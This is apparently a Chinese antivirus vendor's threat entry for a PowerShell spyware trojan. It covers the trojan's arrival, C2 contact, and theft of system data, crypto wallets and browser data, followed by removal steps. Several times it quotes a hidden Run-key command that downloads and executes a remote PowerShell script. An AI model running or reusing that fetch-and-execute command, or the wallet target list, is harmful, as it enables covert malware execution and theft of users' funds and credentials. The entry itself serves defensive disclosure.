分析者: Raighen Sanchez   
 平台:

Windows

 总体风险等级:
 潜在破坏:
 潜在分布:
 感染次数:
 信息暴露:

  • 恶意软件类型:
    Trojan Spy

  • 有破坏性?:
    没有

  • 加密?:
    没有

  • In the Wild:
    是的

  概要

感染途徑: 从互联网下载、由其他恶意软件释放

该木马间谍程序通过两种途径进入系统:一是被其他恶意软件作为文件释放到系统中,二是用户访问恶意网站时在不知情的情况下下载的文件。

它不具备任何传播功能。

它执行来自远程恶意用户的命令,从而严重威胁受感染系统的安全。 该程序会连接至网站进行信息收发。

然而截至本文撰写时,上述网站均已无法访问。

  技术详细信息

文件大小: 26,470 bytes
报告日期: PS1
内存驻留: 是的
初始樣本接收日期: 2025年4月8日
Payload: 收集系统信息, 连接URL/IP地址,窃取信息

Arrival Details

该木马间谍程序通过两种途径进入系统:一是被其他恶意软件作为文件释放到系统中,二是用户访问恶意网站时在不知情的情况下下载的文件。

Installation

该间谍木马会添加以下互斥量,以确保在任何时候仅运行其一个副本:

  • 62088a7b-ae9f-6776-77a-6e9c921cb48e

Autostart Technique

该木马间谍程序会添加以下注册表项,以实现每次系统启动时自动执行:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
Edge Sync = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"& { Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://{BLOCKED}rFixed/$subfolder/payload/remote/general.ps1' ))) -ArgumentList $build, $serverFixed, $subfolder }`""

Propagation

该木马间谍程序不具备任何传播功能。

Backdoor Routine

该间谍木马会执行来自远程恶意用户的以下命令:

  • Execute Arbitrary Commands

它会连接以下网站以发送和接收信息:

  • https://{BLOCKED}tertoken.com:8081

Information Theft

该木马间谍程序会收集以下数据:

  • Public IP Address
  • IP Address Location
  • OS Version
  • List of Installed Anti-Virus
  • Firewall Status
  • Total Uptime of System

其他信息

该间谍木马会连接以下URL以获取受感染系统的IP地址:

  • https://{BLOCKED}fy.org
  • http://{BLOCKED}o.io/$ipAddress/json

它会执行以下操作:

  • 该恶意程序会窃取本地加密货币钱包信息,来源包括:
    • Armory
    • Atomic
    • Bitcoin
    • Binance
    • Bytecoin
    • Coinomi
    • Dash
    • Electrum
    • Ethereum
    • Exodus
    • Guarda
    • com.liberty.jaxx
    • Litecoin
    • MyMonero
    • Monero GUI
    • WallerWasabi
    • Zcash
    • Trezor
    • TronLink
    • Trustwallet
    • Metamask
    • Phantom
    • Sollet
    • Keplr
    • Nifty Wallet
    • Zelcore
    • Zephyr
  • It steals browser data from:
    • Brave
    • Chrome
    • Chromium
    • Edge
    • EpicPrivacy
    • Iridium
    • Opera
    • OperaGX
    • Vivaldi
    • Yandex
    • Firefox
    • Pale Moon
    • Waterfox
  • 该恶意程序会从浏览器中的加密货币钱包窃取信息:
    • Argent X
    • Binance Chain WAllet
    • BitKeep Wallet
    • BlockWallet
    • Crypto.com
    • Enkrypt
    • Ethos Sui
    • ExodusWeb3
    • Guarda
    • Keplr
    • MathWallet
    • Metamask
    • Metamask2
    • OKX
    • OneKey
    • Phantom
    • Ronin
    • SafePal
    • TokenPocket
    • Ton
    • TronLink
    • Trust Wallet
    • Wombat
    • Zeal
    • Rabby
    • Fireblocks
    • Nifty Wallet
    • Sollet
    • PetraAptos
    • XDEFI
    • Nami
    • TerraStation
    • MartianAptos
    • SuietSui
    • Braavos
    • FewchaMove
    • NiftyWallet
    • BraveWallet
    • EqualWallet
    • BitAppWallet
    • iWallet
    • AtomicWallet
    • MewCx
    • GuildWallet
    • SaturnWallet
    • HarmonyWallet
    • PaliWallet
    • BoltX
    • LiqualityWallet
    • MaiarDeFiWallet
    • TempleWallet
    • Ronin_E
    • Yoroi_E
    • MetaMask_O
  • 该恶意程序会检测受感染系统是否安装以下VPN服务:
    • Cisco Systems
    • Palo Alto networks
    • Fortinet
    • OpenVPN
    • WireGuard
  • 该程序会检测当前用户是否拥有管理员权限。

然而截至本文撰写时,上述网站均已无法访问。

它不会利用任何漏洞。

  解决方案

最小扫描引擎: 9.800
First VSAPI Pattern File: 20.160.02
VSAPI 第一样式发布日期: 2025年4月23日
VSAPI OPR样式版本: 20.161.00
VSAPI OPR样式发布日期: 2025年4月24日

Step 1

在进行任何扫描之前,Windows 7、Windows 8、Windows 8.1 和 Windows 10 用户必须先执行以下操作: 禁用 系统还原 以便对电脑进行全面扫描。

Step 2

注意:在此恶意软件/间谍软件/灰色软件执行期间,并非所有文件、文件夹和注册表键值和项都会安装到您的计算机上。这可能是由于不完整的安装或其他操作系统条件所致。如果您没有找到相同的文件/文件夹/注册表信息,请继续进行下一步操作。

Step 3

删除此注册表值

[ 更多 ]

Important: 编辑 Windows Registry 操作不当可能导致系统出现无法恢复的故障。请务必仅在您熟悉相关步骤的情况下执行;如有疑问,可寻求系统管理员的协助。否则,请查看下方链接。 Microsoft article 修改计算机注册表前请务必先进行此操作.

  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • Edge Sync = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"& { Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://{BLOCKED}rFixed/$subfolder/payload/remote/general.ps1' ))) -ArgumentList $build, $serverFixed, $subfolder }`""
请按以下步骤操作=

要删除该恶意/灰色软件创建的注册表值,请执行以下操作:

  1. 打开注册表编辑器。
    » 对于 Windows 7 和 Windows Server 2008 (R2) 用户,请点击 Start button, type regedit in the Search输入字段,然后按下Enter.
    » 对于 Windows 8、Windows 8.1、Windows 10 和 Windows Server 2012 (R2) 用户,请右键点击 屏幕左下角,点击Run, type regedit 在提供的文本框中,然后点击 Enter.
  2. 在左侧面板中,双击以下项目:
    HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run
  3. 在右侧面板中,找到并删除以下条目:
    Edge Sync = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"& { Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://{BLOCKED}rFixed/$subfolder/payload/remote/general.ps1' ))) -ArgumentList $build, $serverFixed, $subfolder }`""
  4. 关闭注册表编辑器。

Step 4

使用您的亚信安全产品扫描电脑,删除被检测为以下名称的文件 TrojanSpy.PS1.POWEATER.A. 若亚信安全产品已将检测到的文件清除、删除或隔离,则无需再执行任何额外步骤;您也可选择直接删除隔离区中的文件。更多信息请访问以下亚信安全支持页面: